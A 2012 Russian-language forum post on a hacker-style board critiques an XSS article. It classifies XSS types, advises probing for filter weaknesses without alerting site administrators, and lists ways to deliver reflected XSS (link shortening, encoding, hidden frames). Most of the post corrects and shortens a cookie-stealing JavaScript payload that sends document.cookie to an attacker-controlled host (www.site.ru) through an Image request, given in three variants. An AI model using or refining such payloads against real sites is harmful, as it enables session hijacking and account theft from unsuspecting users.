Тема: XSS. Межсайтовый скриптинг
Показать сообщение отдельно

  #9  
Старый 09.03.2012, 21:18
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Основные замечания по статье:

XSS делятся не на два типа, а на три:

1) Активные (хранимые)

2) Пассивные (отраженные)

3) DOM-based

Указанные векторы атак не подходят для надежной проверки на XSS-уязвимость. Желательно проверять вручную на фильтрацию определенных символов (в зависимости от места вывода), чтобы не вызвать подозрения у администрации сайта. В крайнем случае, можно использовать универсальные векторы XSS (где их найти, спросите у гугла)

Кража сессии - не единственная возможность XSS (чтение данных со страниц сайта, выполнение запросов, доступ к локальному хранилищу, базам данных)

Не написано о практической эксплуатации пассивных XSS (прямой переход по ссылке, шифрование, сокращение, скрытые фреймы)

Это неправильно:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]img[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]img[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"www.site.ru/ваше_название.gif?"[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR
www.site.ru будет восприниматься как директория относительно текущей.

Никаких действий с объектом img в дальнейшем не производится, поэтому можно сократить код так:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'//www.site.ru/ваше_название.gif?'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR
или с явным указанием протокола:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://www.site.ru/ваше_название.gif?'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR
Непонятно, зачем менять расширение на .gif php-скрипту, сохраняющему куки.
 
Ответить с цитированием